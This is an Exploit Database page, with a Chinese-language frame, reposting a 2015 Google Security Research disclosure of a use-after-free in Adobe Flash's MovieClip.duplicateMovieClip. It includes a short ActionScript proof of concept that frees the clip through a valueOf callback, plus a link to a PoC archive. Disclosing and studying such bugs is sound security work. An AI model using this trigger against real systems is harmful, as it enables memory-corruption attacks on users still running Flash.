Adobe Flash MovieClip.duplicateMovieClip – Use-After-Free

• Exploit Database
• 156 阅读

• 作者： Google Security Research
  日期： 2015-12-18
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39042/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  Source: https://code.google.com/p/google-security-research/issues/detail?id=591   There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or movie name parameter provided is an object with toString or valueOf defined, this method can free the MovieClip, which is then used.   A minimal PoC follows:     this.createEmptyMovieClip("mc", 1);   mc.duplicateMovieClip( "mc",{valueOf : func});     function func(){ trace("in func"); mc.removeMovieClip();   // Fix heap here   return 5; } A sample swf and fla are attached.     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39042.zip